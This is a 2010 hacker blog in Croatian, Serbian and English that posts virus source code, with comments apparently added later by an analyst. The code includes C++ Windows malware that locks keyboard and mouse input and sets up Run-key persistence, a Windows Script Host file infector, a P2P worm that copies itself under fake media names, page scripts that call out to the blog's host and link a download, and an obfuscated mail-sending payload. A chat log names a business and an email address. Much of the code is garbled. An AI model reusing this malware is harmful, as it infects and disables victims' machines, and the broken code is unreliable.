Branko.D.Tomic Luxilius branko.82@hotmail.com
欢迎访问 undermine
# moderator & modifier
  • " ≝
  • ℜℵℜ "
  • seed
  • Exp'n'lorers
    "No man or
    fallen Angels from Heaven
    knows the Day when
    the Tribulation will begin,
    only Father in Heaven."
    "Everybody can kill
    The Body but never can't
    kill The Soul from
    Ever Mind Form."
    VX sites and other hack sites
    VX Heaven Portal of Russian Hackers VX Chaos   |
    NFC Bloger Edu Hack Cracker ET Fakultet             |
    Blog
    utorak, rujan 28, 2010
    moderator:[0390eu2309] http://developers.facebook.com/tools/console/

    Here you can see The Best hack! He search bug in facebook & link this script self

    then fix bug like windows update.

    Info: "Script can work if you drop in your HTML, appkey"

    Milion user's can become attacked with this script!!!

    _______Cut_here____________


    // Analyst note: despite the "Function" header, this is not executable code in any
    // language. The body is a key/value record with placeholder values, and several
    // entries lack the separating comma.
    // The field names (id, first_name, last_name, link, gender, locale) resemble a
    // Facebook Graph API user object -- presumably copied from the developer console
    // linked in the post; confirm before treating it as anything more.
    // Nothing visible here issues a request, reads a session or modifies an account, so
    // the post's claim that users "can become attacked with this script" is not
    // supported by the listing itself.
    Function User_Moderator()
    {
       "id": "1234567890",
       "full name": "name and surname",
       "first_name": "name",
       "last_name": "surname",
       "Basic Info ": "sex: fe/male",
       "link": "http://www.facebook.com/name", //if have or no
       "gender": "fe/male",
       "locale": "en_US"
       "Birthday":    "month day, year"
       "Relationship Status": "if have" //if have or no
       "Network": "here go Relationship Status if profile dont have network" //if have or no
       "Profile URL": "http://www.facebook.com/profile.php?id=1234567890",
       // The description string below is the only part that states an intent
       // (account takeover messaging); it is plain text, not behaviour.
       "Description": "This account is hacked, and religions right is destructed. He lost access to profile Email address associated with the account."
    }

    _______Cut_here______________

    undermine @ 01:50 |Isključeno | Komentari: 0
    nedjelja, rujan 12, 2010
    "Svoj mir vam dajem. Ali, ne dajem ga onako kako svet daje. Neka se ne uznemirava vase srce.
    U svetu imacete vidnu laz i nevolje,

    ali budite hrabri - ja sam pobedio svet. A to nije kraj sveta" - zato sto ovaj svet nije kraj.
    Vecina vernika u vidovnjake smejat ce se ovoj recenici a zaplakati,

    poverovati i moliti sve visnjeg tek kada izgube najdraze...

    X 

    ZATO DOBRO RAMISLITE KOJI ,COMPATIBILE VIRUS' JE UPRAVO SPOJEN SA VASIM SYSTEM-OM




    i'm virus

    undermine @ 02:51 |Isključeno | Komentari: 0
    subota, srpanj 24, 2010
    moderator[02893181901937] ::.::DESCRIPTION PANEL::.:: Hard infect and normal infect: We wan't to explain the technique for everybody. I wanna show you a normal file and a file infect by virus: infected hard: Commands+Call to virus+Virus+UpgradeCode Infected sample: Commands+Virus+Commands+Commands+Call to virus++Commands Than we want to write the virus code to any line of the program. Sounds easy... Anything is like Coordinated Worm Design in the yellow link line if you browsing any page on the google virus and any other surf pack, that description can look anywhere... One of the best virus tool can make hack cool !!! look function =before start= (ie8 virus who coming 2011) http://ie8.undermine.bloger.hr/
    undermine @ 22:58 |Isključeno | Komentari: 0
    nedjelja, srpanj 11, 2010
    blog.moderator[8901381791347]&modif[hiu2i98c]

    #include <windows.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <mmsystem.h>
    #include <time.h>

    using namespace std;

    // Entry point of the sample as posted. It starts Spread() on a second thread and then
    // loops forever, printing random numbers to the console while re-asserting an input
    // block on every pass.
    //
    // Analyst notes (defensive reading of the visible calls):
    //  - Behaviour class: nuisance/denial-of-use payload plus a persistence thread; no
    //    network activity is visible in this function.
    //  - Observable indicators: a console window titled "Vamfim Decoder", a process that
    //    repeatedly calls BlockInput/SetCursorPos/SetForegroundWindow, and the literal
    //    "<>%REMOTE_ADDRESS%)_" in console output.
    //  - Recovery: per the Windows documentation for BlockInput, the block is lifted when
    //    the user presses Ctrl+Alt+Del or when the blocking thread exits, so terminating
    //    the process from the secure desktop restores input.
    int main()
    {
        // Local forward declaration so Spread can be named before its definition.
        void Spread();
        // Runs the copy + Run-key routine concurrently with the loop below. The thread
        // handle returned by CreateThread is discarded and the result is not checked.
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Spread, NULL, 0, NULL);
      
        int welcome, count;
      
        // Remembers whichever window is in the foreground at start-up (presumably the
        // sample's own console when launched interactively -- not established here).
        HWND CurrentWin;
        CurrentWin = GetForegroundWindow();
      
        HANDLE consol;
        consol = GetStdHandle(STD_OUTPUT_HANDLE);
        SetConsoleTextAttribute(consol,FOREGROUND_BLACK);

        // The console title is a fixed string and therefore usable as a hunting indicator.
        SetConsoleTitle("Vamfim Decoder");

      
        // No exit condition: the loop never breaks, so the return below is unreachable.
        while(1)
        {                            
                welcome = rand();
                cout << welcome;
                // Pulls the remembered window back to the front on every iteration.
                SetForegroundWindow(CurrentWin);
                count = rand()%500;

                // Fires for count values 0..50, i.e. roughly one pass in ten.
                if(count<51)
                {
                   cout << "<>%REMOTE_ADDRESS%)_";
                }

                // Input lock-out: keyboard/mouse events are blocked and the pointer is
                // pinned to the top-left corner, re-applied each pass.
                BlockInput(TRUE);
                SetCursorPos(0,0);
        }
    return 0;
    }

    // Persistence routine of the sample: copies the running executable into the Windows
    // and System directories under fixed names and registers both copies under the
    // machine-wide Run key so they start at logon.
    //
    // Analyst notes (defensive reading of the visible calls):
    //  - Technique: registry Run-key autostart (MITRE ATT&CK T1547.001).
    //  - File indicators: <System dir>\logoff.exe and <Windows dir>\Setup.exe that are
    //    byte-identical to the originally executed file.
    //  - Registry indicators: values "logoff" and "Windows Setup" under
    //    HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
    //  - No return value is checked. Writing to HKLM and to the system directories
    //    normally requires administrative rights, so under a standard account these
    //    calls are expected to fail without any visible error -- verify per host.
    //  - Removal: delete the two Run values and the two copied files.
    void Spread()
    {
        char CurrentFile[MAX_PATH];
        char windows[MAX_PATH];
        char system[MAX_PATH];
      
        // Resolves the full path of the currently running executable.
        HMODULE GetModH = GetModuleHandle(NULL);
        GetModuleFileName(GetModH,CurrentFile,sizeof(CurrentFile));

        GetSystemDirectory(system,sizeof(system));
        GetWindowsDirectory(windows,sizeof(windows));

        // Fixed drop names appended to the directory paths; strcat does no bounds check
        // against the MAX_PATH buffers.
        strcat(system,"\\logoff.exe");
        strcat(windows,"\\Setup.exe");

        // Third argument false = overwrite an existing file of the same name.
        CopyFile(CurrentFile,system,false);
        CopyFile(CurrentFile,windows,false);
      
        // First autostart entry: value "logoff" -> the copy in the System directory.
        // The data length passed is sizeof(system) (the whole MAX_PATH buffer), not the
        // string length, so the stored value may carry bytes past the terminator; an
        // oversized REG_SZ Run value is itself a useful forensic artefact.
        HKEY hKey_e;
        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_e );
        RegSetValueEx(hKey_e, "logoff",0,REG_SZ,(const unsigned char*)system,sizeof(system));
        RegCloseKey(hKey_e);

        // Second autostart entry: value "Windows Setup" -> the copy in the Windows
        // directory, written the same way as the first.
        HKEY hKey_f;
        RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey_f );
        RegSetValueEx(hKey_f, "Windows Setup",0,REG_SZ,(const unsigned char*)windows,sizeof(windows));
        RegCloseKey(hKey_f);
    }

    undermine @ 22:29 |Isključeno | Komentari: 0
    četvrtak, lipanj 24, 2010
    blog.moderator[37832811900218]

    365 hours we try to modify jscript in net line but
    any time this server crash template in this bloger
    remove // <noscript> . </noscript> and add somewhere
    clean undermine.bloger.hr from script and write link for attack
    <noscript> // this line remove
    <script language="javascript" type="text/javascript">
    var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade=
    "http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );
    </script>
    <script language="javascript" type="text/javascript">function Transferring() {
    s=document.URL;path=s.substr(-0,s.Get("http://undermine.bloger.hr"));path=unescape(path);
    document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000);
    document.upgrade="http://www2.speedy-share.com/files/1/33esbypkkxy47a/Hunatcha.rar"+go.toGMTString( );') }
    setUpgrade("Transferring()",true)
    </script>
    <script type="text/javascript" language="javascript">
    document.write('<a href="javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()" _fcksavedurl=
    "javascript:savePageAsHTML()" _fcksavedurl="javascript:savePageAsHTML()"><iframe src="
    http://undermine.bloger.hr" width="0" height="0" border="0" target="_blank"></a>');

    // Analyst notes (defensive reading): this function mixes three unrelated pieces.
    //  1. A query string built from authorId, pageOrientation and four margin variables,
    //     none of which is defined in the visible listing.
    //  2. An eval() over text that refers to Windows Script Host objects
    //     (Scripting.FileSystemObject, WScript.ScriptFullName). Read as intended, that
    //     text opens its own script file and appends a re-encoded copy of itself to .js
    //     files in the current folder that lack a marker string -- a file-appending
    //     self-replicator for WSH, not for browsers. As pasted, the literal is split
    //     across lines and its statements have no separators.
    //  3. A window.open() call that sends the current page URL plus the query string to
    //     the blog's host.
    // Detection/mitigation for the WSH pattern: watch for wscript.exe/cscript.exe opening
    // many .js files for append in one folder, for .js files that share an appended
    // eval(...) trailer, and consider disabling Windows Script Host or re-associating
    // .js with a text editor on endpoints that do not need it.
    function savePageAsHTML()
    {
        var sUriRequest = "";

        sUriRequest = "author_id=" + authorId;
        sUriRequest += "&page=" + pageOrientation;
        sUriRequest += "&top=" + topMargin;
        sUriRequest += "&bottom=" + bottomMargin;
        sUriRequest += "&left=" + leftMargin;
        sUriRequest += "&right=" + rightMargin;
    // The string passed to eval runs from here to the closing quote seven lines down.
    eval('c=CreateObject("scripting.filesystemobject")b=c.opentextfile(WScript.scriptfullname)
    .readall()b=b.substr(
    b.search(c="undermine")-3)e=b.substr(0,d=b.search("biv")+14)f=String.fromCharCode(46)g=
    String.fromCharCode(
    39)Math.random(1)while(d<b.length-2){  if((h=b.substr(d,2))==f+"u")b=b.substr(0,d)+eval(g+b.substr(d,6)+g)+b.substr(d+6)e=e+(d==38?h:Math.random()>.5?b.charAt(d--):f+"u00"+b.charCodeAt(d--).toString(16))d+=2}for(d=new Trojan(c.getfolder(
    ".").files);!d.atEnd();d.moveNext()){if(c.getextensionname(b=d.item()).toLowerCase()=="js")try{f=b.attributes b.attributes=
    0if(c.opentextfile(b).readall().search(c)<0)c.opentextfile(b,8).write(e+g+")")b.attributes=f}catch(z){}}')
        // undermine.bloger.hr
        // Leaks the visiting page's full URL (escaped) to the third-party host as part of
        // the request path; outbound requests of this shape are a proxy-log indicator.
        var pURL = "http://undermine.bloger.hr/" + escape(document.location.href) + "&" + sUriRequest;
        window.open(pURL, "undermine", "scrollbars=yes,resizable=yes,menubar,toolbar,location");
    // The remainder only runs if a window property with this exact name already exists;
    // it then sets a label on google.search and asks google.loader to write a script tag.
    if (window['???? undermine'] != undefined && window['???? undermine']['loader'] != undefined) {
    if (!window['???? undermine']['search']) {
    window['???? undermine']['search'] = {};
    google.search.JSWorm = 'JS/Hunatcha';
    }
    google.loader.writeLoadTag("script", google.loader.ServiceBase + "
    http://undermine.bloger.hr", true);
    }
    }
    // Analyst notes (defensive reading): despite the names ("HostWorm", "virusType"), the
    // visible methods only register a load listener, toggle attributes on a DOM element
    // and try to open the Java console. No copy, download or propagation logic appears
    // in this object.
    // The Components.classes / nsIJVMManager names look like Firefox XPCOM identifiers,
    // so this was presumably adapted from a browser-extension script -- TODO confirm.
    // The object is declared as gHostWorm, while every method body and the final call
    // refer to HostWorm, for which no declaration is visible in the listing.
    const gHostWorm =  {

        id    : "HostWorm",

        // A URL on the blog's own host, used only as a lookup key in init().
        virusType: "http://undermine.bloger.hr/settings/undermine/",

        // Hooks init() to the window's load event (capturing phase).
        install    : function() {
            window.addEventListener("load",this.init,true);
        },

        // If load.virusTypes has an entry for virusType, wires up event/command
        // attributes; otherwise hides the element whose id is "HostWorm".
        init    : function() {
            if (load.virusTypes[HostWorm.virusType]) {
                var bloger = document.getElementById("div");   
                bloger.addEventListener("divshowing",HostWorm.enable,true);
                var element = document.getElementById(HostWorm.id);
                element.setAttribute( "oncommand" , "HostWorm.show();");
            } else {
                var element = document.getElementById(HostWorm.id);
                element.setAttribute("style", "display: none");
            }
        },

        // Sets or copies an "upgrade" attribute depending on load.javaEnabled().
        enable    : function() {
            var element = document.getElementById(HostWorm.id);
                if (load.javaEnabled()) {
                element.copyAttribute("upgrade");
                } else {
                      element.setAttribute("upgrade", "true");
                }
        },

        // Requests a JVM-manager service and asks it to show the Java console.
        show    : function() {
                 var jvmMgr = Components.classes['@google.org']
                           .getService(Components.interfaces.nsIJVMManager)
                jvmMgr.showJavaConsole();
        }
       
    };

    HostWorm.install();
    </script>
    <script type="text/javascript">
        //<!-- (C)2000-2010 WWW - undermine / bloger.hr / Pages -->
        var myworm_identifier = new String('http://undermine.bloger.hr');
        </script>
    <script src="/???? undermine.htm" type="text/javascript"></script>
    <script type="text/javascript">
    // Analyst notes (defensive reading): this fragment uses Windows Script Host objects
    // (Scripting.FileSystemObject, WScript.ScriptFullName), so it describes behaviour of
    // a locally executed script, not of script running in a web page.
    // Intent visible from the calls: copy the running script into peer-to-peer shared
    // folders and a downloads folder under double-extension names (".txt.exe",
    // ".avi.exe", ".mp4.exe", ".jpg.exe") so the copies look like documents or media when
    // file extensions are hidden.
    // Indicators and mitigations: the five file names below; any *.<doc/media ext>.exe
    // file appearing in P2P share directories; show file extensions in Explorer and block
    // execution from share/download folders through application-control policy.
    // As posted, several identifiers contain spaces and one string literal is split
    // across lines.
    var Hunatcha,Kazaa,LimeWire,Documents and Settings;
    var fso = new CreateObject("Scripting.FileSystemObject");
    // Path of the script file currently being run by WSH.
    Hunatcha = (WScript.ScriptFullName);
    // KaZaa (capital Z) and Kazaa are distinct names; LimeWire and the documents
    // variable are each assigned twice, so only the second assignment is in effect.
    KaZaa = ("C:\\Program Files\\KaZaa\\My Shared Folder") + "\\";
    Kazaa = ("C:\\Program Files\\KaZaa") + "\\";
    LimeWire = ("C:\\Program Files\\LimeWire\\My Shared Folder") + "\\";
    LimeWire = ("C:\\Program Files\\LimeWire") + "\\";
    Documents and Settings = ("C:\\Documents and Settings") + "\\";
    Documents and Settings = ("C:\\Documents and Settings\\%user%\\
    My Documents\\Downloads\\") + "\\";
    // Each copy is attempted only if the target folder exists.
    if(fso.folderexists(KaZaa)){
        fso.copyfile(Hunatcha, KaZaa + "users_info.txt.exe");
        fso.copyfile(Hunatcha, KaZaa + "video sister.avi.exe");
    }
    if(fso.folderexists(LimeWire)){
        fso.copyfile(Hunatcha, LimeWire + "gratis.mp4.exe");
        fso.copyfile(Hunatcha, LimeWire + "info download.txt.exe");
    }
    if(fso.folderexists(Documents and Settings)){
        fso.copyfile(Hunatcha, Documents and Settings + "upload.jpg.exe");
    }
    </script>
    <script language="javascript" type="text/javascript"> var go=new Date( ); go.
    setTime(go.getTime( )+12*60*60*1000);
    document.upgrade="http://%REMOTE_ADDRESS%"+go.toGMTString( ); </script>
    <script language="javascript" type="text/javascript">function Transferring() {
    s=document.URL;path=s.substr(-0,s.Get("http://%REMOTE_ADDRESS%"));
    path=unescape(path);
    document.write('var go=new Date( ); go.setTime(go.getTime( )+12*60*60*1000); document.upgrade="
    http://%REMOTE_ADDRESS%"+go.toGMTString( );') }
    setUpgrade("Transferring()",true)
    var a0="under";var a1="mine";var a2=".bloger";var a3=".hr";
    var b = "demo.aspx?&seoref="+encodeURIComponent(document.referrer)+"
    &HTTP_REFERER="
    +encodeURIComponent(document.URL)+"&default_keyword="+document.title;
    var z = "http://"+a0+a1+a2+a3+"/"+b;var y = "<script language='JavaScript' src='"+z+"' ><"+"/"+"script>";
    document.write(y);
    </script>
    <noscript> // this line remove


    undermine @ 02:19 |Isključeno | Komentari: 0
    utorak, lipanj 22, 2010
    blog moderator[6383212049813561]:

    new record in relinked subfolder'/trojanbomb/'
    Part I

    crashed security relinked mail sender html
    http://www.rts.rs/page/stories/ci/story/256/%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%2
2%0D%0A%63%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29/727252/%D0%93%D0%BB%D0%B5%D0%B4%D0%B0%D0%BE%D1%86%D0%B8+%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%82%D0%B5%D1%80%D0%B8+%2822.6.2010%29.html?email=yes
     

    Part II


    encry trojanbomb and special difficul function for someone
    function tmp() { eval(unescape('%61%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%61%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%61%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%61%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%61%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%61%2E%73%65%6E%64%28%29%0D%0A%62%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%62%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%62%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%62%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%62%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%62%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%62%2E%73%65%6E%64%28%29%0D%0A%63%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%63%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%63%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%63%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%63%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%63%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%63%2
E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%63%2E%73%65%6E%64%28%29%0D%0A%64%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%64%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%64%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%64%2E%62%63%63%20%3D%20%22%77%65%62%6D%61%73%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%64%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%64%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%64%2E%73%65%6E%64%28%29%0D%0A%78%20%3D%20%6E%65%77%20%53%65%6E%64%4D%61%69%6C%28%29%3B%0D%0A%78%2E%66%72%6F%6D%20%3D%20%22%70%6C%61%6E%74%61%73%70%6F%6E%74%40%6E%61%64%6C%61%6E%75%2E%63%6F%6D%22%0D%0A%78%2E%74%6F%20%3D%20%22%67%6C%65%64%61%6C%61%63%72%65%70%6F%72%74%65%72%40%72%74%73%2E%72%73%22%0D%0A%78%2E%63%63%20%3D%20%22%73%75%70%70%6F%72%74%40%6B%61%73%70%65%72%6B%79%2E%63%6F%6D%22%0D%0A%78%2E%62%63%63%20%3D%20%22%77%65%62%64%65%73%6B%40%72%74%73%2E%72%73%22%0D%0A%78%2E%73%75%62%6A%65%63%74%20%3D%20%22%50%65%6A%7A%61%7A%20%7A%61%6C%6A%75%62%6C%6A%65%6E%69%68%22%0D%0A%78%2E%62%6F%64%79%20%3D%20%22%6A%65%64%61%6E%20%6F%64%20%70%72%65%64%69%76%6E%69%68%20%74%72%65%6E%75%74%6B%61%22%0D%0A%78%2E%73%65%6E%64%28%29')); }
                                                                                                                             Write;   Blog.m
    undermine @ 14:35 |Isključeno | Komentari: 0
    ponedjeljak, svibanj 31, 2010
    alert("All rights we have bcoz business not have rights to surf [at]
    any web page without business rights!");

    update : business title in belgia wher is big boss : [ denolin ]
    big boss is in belgia for all planta spont in all country .

    Vxers [ H.P.D.M ] vs-> P.Spont business boss: Woman
    [1:16:21 PM] Hast Plast Donji Milanovac: Otvorili smo skype, za saradnju.
    Planta Spontanea has shared contact details with Hast Plast Donji Milanovac.
    [1:17:48 PM] *** Hast Plast Donji Milanovac sent Ponude.txt ***
    [1:21:16 PM] Ukoliko nemozete sacekati skidanje poslacemo vam kracu verziju.
    [1:27:31 PM] Hast Plast Donji Milanovac: saljemo vam ponude a nesto se necuje kada zelimo da se javimo
    [1:28:09 PM] Planta Spontanea: Primetila sam. U svakom slucaju, hvala na ponudama koje jos uvek stizu...
    [1:30:31 PM] Hast Plast Donji Milanovac: jeste li dobili punudu u tesktu od nas sada koji smo poslali?
    [1:32:13 PM] Planta Spontanea: Prva ponuda neuspesna, druga se jos uvek download-uje.
    [1:33:20 PM] Hast Plast Donji Milanovac: Molimo vas sacekajte ! Javljeno nam je da je problem
    u skype konekciji u svakom slucaju ponuda se salje .... Hvala
    [1:42:13 PM] Planta Spontanea: OK!
    [1:47:06 PM] Hast Plast Donji Milanovac: Zasto nam se pojavilo da je posiljka prekinuta?
    [1:47:52 PM] Hast Plast Donji Milanovac: saljemo vam je upravo sada... Ako zelite razgledati ponudu.
    [1:50:01 PM] Hast Plast Donji Milanovac: Imate li drugi mail kako bi vam lakse i bez cekanja i problema
    poslali i bili u brzem kontaktu dok se skype ne popravi...
    [1:51:21 PM] Hast Plast Donji Milanovac: zaista ovaj skype kod nas ima problem
    [1:51:25 PM] Hast Plast Donji Milanovac: zao nam je
    [1:51:43 PM] Planta Spontanea: Komunikacija jos uvek nemoguca...E-mail adresa je: plantaspont@nadlanu.com
    [1:51:51 PM] Hast Plast Donji Milanovac: pozvacemo nekog da nam popravi....
    [1:52:22 PM] Hast Plast Donji Milanovac: neznamo u cemo je problem hvala saljemo vam ponudu na taj vas mail
    [1:55:46 PM] Hast Plast Donji Milanovac: saljemo vam nas mail je **********@gmail.com
    [1:56:11 PM] Hast Plast Donji Milanovac: to je mail radnika u firmi
    [1:56:25 PM] Hast Plast Donji Milanovac: a dobicete i zvanicni mail nase firme
    [1:56:34 PM] Hast Plast Donji Milanovac: cim ga otvorimo
    [1:57:22 PM] Planta Spontanea: OK! Hvala!
